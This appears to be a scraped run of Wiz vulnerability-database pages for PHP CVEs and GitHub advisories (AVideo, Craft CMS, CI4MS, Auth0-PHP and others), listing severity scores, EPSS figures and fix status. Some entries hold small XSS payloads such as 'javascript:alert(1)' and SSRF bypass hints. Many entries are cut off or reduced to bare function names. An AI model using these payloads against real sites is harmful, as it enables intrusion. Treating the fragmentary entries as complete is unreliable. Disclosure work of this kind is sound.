Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-
Wiz
CVE-2026-33719 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33719 [HIGH] CVE-2026-33719 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33719 :
PHP vulnerability analysis and mitigation
plugin/CDN/status.json.php
plugin/CDN/disable.json.php
par
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
P
Wiz
CVE-2026-33478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 10.0
CVE-2026-33478 [CRITICAL] CVE-2026-33478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33478 :
PHP vulnerability analysis and mitigation
clones.json.php
cloneServer.json.php
cloneClient.json.php
Source : NVD
## 10
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 10.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 83.4
Exploitation Probability (EPSS) 2
Affected packages and libraries
avideo/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has
Wiz
CVE-2025-67746 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.3
CVE-2025-67746 [LOW] CVE-2025-67746 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67746 :
PHP vulnerability analysis and mitigation
Composer is a dependency manager for PHP. In versions on the 2.x branch prior to 2.2.26 and 2.9.3, attackers controlling remote sources that Composer downloads from might in some way inject ANSI control characters in the terminal output of various Composer commands, causing mangled output and potentially leading to confusion or DoS of the terminal application. There is no proven exploit and this has thus a low severity but we still publish a CVE as it has potential for abuse, and we want to be on the safe side informing users that they should upgrade. Versions 2.2.26 and 2.9.3 contain a patch for the issue.
Source : NVD
## 1.3
Score
Published December 30, 2025
Severity LOW
CNA Score 1.3
Affected Technologies
PHP
Com
Wiz
CVE-2025-68129 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2025-68129 [MEDIUM] CVE-2025-68129 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68129 :
PHP vulnerability analysis and mitigation
Auth0-PHP is a PHP SDK for Auth0 Authentication and Management APIs. In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens. Projects are affected if they use Auth0-PHP SDK versions between v8.0.0 and v8.17.0, or applications using the following SDKs that rely on the Auth0-PHP SDK versions between v8.0.0 and v8.17.0: Auth0/symfony versions between 5.0.0 and 5.5.0, Auth0/laravel-auth0 versions between 7.0.0 and 7.19.0, and/or Auth0/wordpress plugin versions between 5.0.0-BETA0 and 5.4.0. Auth0/Auth0-PHP version 8.18.0 contains a patch for the issue.
Source : NVD
## 7.5
Score
Publi
Wiz
CVE-2020-36947 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2020-36947 [HIGH] CVE-2020-36947 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-36947 :
PHP vulnerability analysis and mitigation
LibreNMS 1.46 contains an authenticated SQL injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. Attackers can exploit the vulnerability by manipulating the 'sort' parameter with crafted SQL injection techniques to retrieve sensitive database contents through time-based blind SQL injection.
Source : NVD
## 7.1
Score
Published January 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
librenms/librenms
Sources
NVD
Compos
Wiz
CVE-2025-69215 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2025-69215 [HIGH] CVE-2025-69215 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69215 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. In version 2.9.8 and prior, there is a SQL Injection vulnerability in the Stampe Module. At time of publication, no known patch exists.
Source : NVD
## 8.7
Score
Published February 4, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11
Exploitation Probability (EPSS) N/A
Affected packages and libraries
devcode-it/openstamanager
Sources
NVD
Composer Severity HIGH No Fix Added at: Feb 04, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—s
Wiz
CVE-2026-27129 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-27129 [MEDIUM] CVE-2026-27129 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27129 :
PHP vulnerability analysis and mitigation
gethostbyname()
Source : NVD
## 5.7
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.7
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/cms
cpe:2.3:a:craftcms:craft_cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE risk assessment
Get a pr
Wiz
CVE-2026-33038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33038 [HIGH] CVE-2026-33038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33038 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. Versions 25.0 and below are vulnerable to unauthenticated application takeover through the install/checkConfiguration.php endpoint. install/checkConfiguration.php performs full application initialization: database setup, admin account creation, and configuration file write, all from an unauthenticated POST input. The only guard is checking whether videos/configuration.php already exists. On uninitialized deployments, any remote attacker can complete the installation with attacker-controlled credentials and an attacker-controlled database, gaining full administrative access. This issue has been fixed in version 26.0.
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity
Wiz
CVE-2026-33500 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-33500 [MEDIUM] CVE-2026-33500 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33500 :
PHP vulnerability analysis and mitigation
ParsedownSafeWithLinks
safeMode
[text](javascript:alert(1))
inlineLink()
sanitizeATag()
safeMode
javascript:
sanitiseElement()
filterUnsafeUrlInAttribute()
Source : NVD
## 5.4
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Relate
Wiz
CVE-2026-25509 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25509 [MEDIUM] CVE-2026-25509 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25509 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, the authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process. This issue has been patched in version 0.28.5.0.
Source : NVD
## 5.3
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exp
Wiz
GHSA-7hmv-4j2j-pp6f Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-7hmv-4j2j-pp6f Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-7hmv-4j2j-pp6f :
PHP vulnerability analysis and mitigation
## Impact
ActorEventPacket
ActorEventPacket
AnimatePacket
LevelSoundEventPacket
## Patches
ActorEventPacket
## Workarounds
DataPacketDecodeEvent
ActorEventPacket
Source : NVD
## 4.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pocketmine/pocketmine-mp
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 07, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just
Wiz
CVE-2026-34566 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34566 [CRITICAL] CVE-2026-34566 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34566 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Page Management functionality when creating or editing pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side. These stored values are later rendered without proper output encoding across administrative page lists and public-facing page views, leading to stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Score 9.1
Affe
Wiz
GHSA-p2gh-cfq4-4wjc Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-p2gh-cfq4-4wjc Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-p2gh-cfq4-4wjc :
PHP vulnerability analysis and mitigation
## Impact
varint
## Patches
Patches have been released to 5.34.0-RC1 and 4.33.6.
Source : NVD
## 7.1
Score
Published March 25, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
google/protobuf
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component
Wiz
CVE-2026-35181 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-35181 [MEDIUM] CVE-2026-35181 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35181 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.
Source : NVD
## 4.3
Score
Published April 6, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitation Probabi
Wiz
CVE-2026-28782 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-28782 [MEDIUM] CVE-2026-28782 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28782 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.1 and 4.17.0-beta.1, the "Duplicate" entry action does not properly verify if the user has permission to perform this action on the specific target elements. Even with only "View Entries" permission (where the "Duplicate" action is restricted in the UI), a user can bypass this restriction by sending a direct request. Furthermore, this vulnerability allows duplicating other users' entries by specifying their Entry IDs. Since Entry IDs are incremental, an attacker can trivially brute-force these IDs to duplicate and access restricted content across the system. This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source : NVD
## 5.3
Score
Published Ma
Wiz
CVE-2026-28424 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-28424 [MEDIUM] CVE-2026-28424 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28424 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, user email addresses were included in responses from the user fieldtype’s data endpoint for control panel users who did not have the "view users" permission. This has been fixed in 5.73.11 and 6.4.0.
Source : NVD
## 6.5
Score
Published February 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
statamic/cms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Mar 02, 2026
##
Wiz
CVE-2026-33480 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33480 [HIGH] CVE-2026-33480 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33480 :
PHP vulnerability analysis and mitigation
isSSRFSafeURL()
::ffff:x.x.x.x
plugin/LiveLinks/proxy.php
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 13.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Pu
Wiz
CVE-2025-68437 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.0
CVE-2025-68437 [MEDIUM] CVE-2025-68437 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68437 :
PHP vulnerability analysis and mitigation
save__Asset
_file
url
url
Source : NVD
## 5
Score
Published January 5, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Jan 05, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 06, 2026
Windows Severity MEDIUM Has Fix Added at: Jan 06, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 13, 2026
Windows Severity MEDIUM Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Wiz
CVE-2026-34570 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-34570 [HIGH] CVE-2026-34570 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34570 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to immediately revoke active user sessions when an account is deleted. Due to a logic flaw in the backend design, account state changes are enforced only during authentication (login), not for already-established sessions. The system implicitly assumes that authenticated users remain trusted for the lifetime of their session. There is no session expiration or account expiration mechanism in place, causing deleted accounts to retain indefinite access until the user manually logs out. This behavior breaks the intended access control policy a
Wiz
CVE-2026-33690 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33690 [MEDIUM] CVE-2026-33690 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33690 :
PHP vulnerability analysis and mitigation
getRealIpAddr()
objects/functions.php
Source : NVD
## 5.3
Score
Published March 23, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h
Wiz
GHSA-7hh9-gp72-wh7h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-7hh9-gp72-wh7h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-7hh9-gp72-wh7h :
PHP vulnerability analysis and mitigation
## Description
In applications built with the Auth0-PHP SDK, the audience validation in access tokens is performed improperly. Without proper validation, affected applications may accept ID tokens as Access tokens.
## Affected product and versions
Users are affected if they meet the following preconditions:
Applications using the Auth0 laravel-auth0 SDK with versions between 7.0.0 and 7.19.0,
Auth0 laravel-auth0 SDK uses the Auth0-PHP SDK with versions between 8.0.0 and 8.17.0.
## Resolution
Upgrade Auth0/laravel-auth0 to version 7.20.0 or greater.
## Acknowledgement
Okta would like to thank Jafar Sadiq (iaf4r) for their discovery and responsible disclosure.
Source : NVD
## 6.8
Score
Published Decemb
Wiz
CVE-2026-32268 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-32268 [HIGH] CVE-2026-32268 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32268 :
PHP vulnerability analysis and mitigation
DefaultController->actionLoadContainerData()
Source : NVD
## 8.7
Score
Published March 18, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/azure-blob
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 17, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published da
Wiz
GHSA-jp3q-wwp3-pwv9 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-jp3q-wwp3-pwv9 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-jp3q-wwp3-pwv9 :
PHP vulnerability analysis and mitigation
dangerouslySetInnerHTML
Ecosystem: Packagist (Craft CMS plugin)
Package: solspace/craft-freeform
Version:
Open the form builder view containing the field.
Alert executes (stored XSS).
alert('xss-icon')
Open the integrations CP view.
Script executes.
Impact Arbitrary JS in admin CP; session/CSRF token theft; potential full admin takeover via DOM-driven actions. Remediation
dangerouslySetInnerHTML
Server-side: strip/escape disallowed tags on save for fields, integration metadata, WYSIWYG content.
Workarounds
Restrict form-edit permissions to trusted admins only until patched.
Consider CSP that disallows inline scripts (defense-in-depth only).
Credits
Discovered by https://www.linkedin.com/in/praveenkavinda/
Wiz
CVE-2025-67719 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-67719 [HIGH] CVE-2025-67719 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67719 :
PHP vulnerability analysis and mitigation
Ibexa is a composable end-to-end DXP (Digital Experience Platform). Versions 5.0.0-beta1 through 5.0.3 do not have password validation. During the transition from v4 to v5 an error was introduced into validation code which causes the validation of the previous password not to run as expected. This makes it possible for a logged in user to change their password in the back office without knowing the previous password. For example, if a user logs into their account and walks away without locking their workstation, an attacker could access the unattended session and change the password, therefore locking the legitimate user out. This issue is fixed in version 5.0.4.
Source : NVD
## 8.5
Score
Published December 11, 2025
Sev
Wiz
CVE-2026-24419 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-24419 [HIGH] CVE-2026-24419 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24419 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Error-Based SQL Injection vulnerability in the Prima Nota (Journal Entry) module's add.php file. The application fails to validate that comma-separated values from the id_documenti GET parameter are integers before using them in SQL IN() clauses, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Prob
Wiz
CVE-2026-33493 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33493 [HIGH] CVE-2026-33493 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33493 :
PHP vulnerability analysis and mitigation
objects/import.json.php
fileURI
.mp4
objects/listFiles.json.php
realpath()
videos/
import.json.php
.txt
.html
.htm
.mp4
.mp4
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Wiz
CVE-2026-3244 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3244 [MEDIUM] CVE-2026-3244 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3244 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, A stored cross-site scripting (XSS) vulnerability exists in the search block where page names and content are rendered without proper HTML encoding in search results. This allows authenticated, rogue administrators to inject malicious JavaScript through page names that executes when users search for and view those pages in search results. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks zolpak for reporting
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KE
Wiz
CVE-2019-25317 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2019-25317 [MEDIUM] CVE-2019-25317 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25317 :
PHP vulnerability analysis and mitigation
Kimai 2 contains a persistent cross-site scripting vulnerability that allows attackers to inject malicious scripts into timesheet descriptions. Attackers can insert SVG-based XSS payloads in the description field to execute arbitrary JavaScript when the page is loaded and viewed by other users.
Source : NVD
## 5.1
Score
Published February 11, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 12, 2026
## Get a CVE risk
Wiz
GHSA-ghc5-95c2-vwcv Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-ghc5-95c2-vwcv Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-ghc5-95c2-vwcv :
PHP vulnerability analysis and mitigation
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
Consumers are affected if their application meets the following preconditions:
It uses the Auth0 Symfony SDK, versions between 5.0.0 and 5.7.0
Auth0 Symfony SDK using the Auth0-PHP SDK versions between 8.0.0 to 8.18.0.
## Resolution
Upgrade Auth0/symfony-auth0 to version 5.8.0 or greater.
Source : NVD
## 8.2
Score
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/
Wiz
CVE-2026-27016 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-27016 [MEDIUM] CVE-2026-27016 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27016 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 24.10.0 through 26.1.1 are vulnerable to Stored XSS via the unit parameter in Custom OID. The Custom OID functionality lacks strip_tags() sanitization while other fields (name, oid, datatype) are sanitized. The unsanitized value is stored in the database and rendered without HTML escaping. This issue is fixed in version 26.2.0.
Source : NVD
## 5.4
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.2
Exploitation Probability (EPSS) N/A
Affected packag
Wiz
CVE-2026-30879 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-30879 [MEDIUM] CVE-2026-30879 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30879 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has a cross-site scripting vulnerability in blog posts. This issue has been patched in version 5.2.3.
Source : NVD
## 6.9
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just wh
Wiz
CVE-2026-33661 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33661 [HIGH] CVE-2026-33661 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33661 :
PHP vulnerability analysis and mitigation
verify_wechat_sign()
src/Functions.php
localhost
Host: localhost
Source : NVD
## 7.5
Score
Published March 26, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 25.8
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
yansongda/pay
pay
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
Homebrew Severity HIGH Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE
Wiz
CVE-2026-35545 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35545 [MEDIUM] CVE-2026-35545 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35545 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.15 and 1.6.15. The remote image blocking feature can be bypassed via SVG content in an e-mail message. This may lead to information disclosure or access-control bypass. This involves the animate element with attributeName=fill/filter/stroke.
Source : NVD
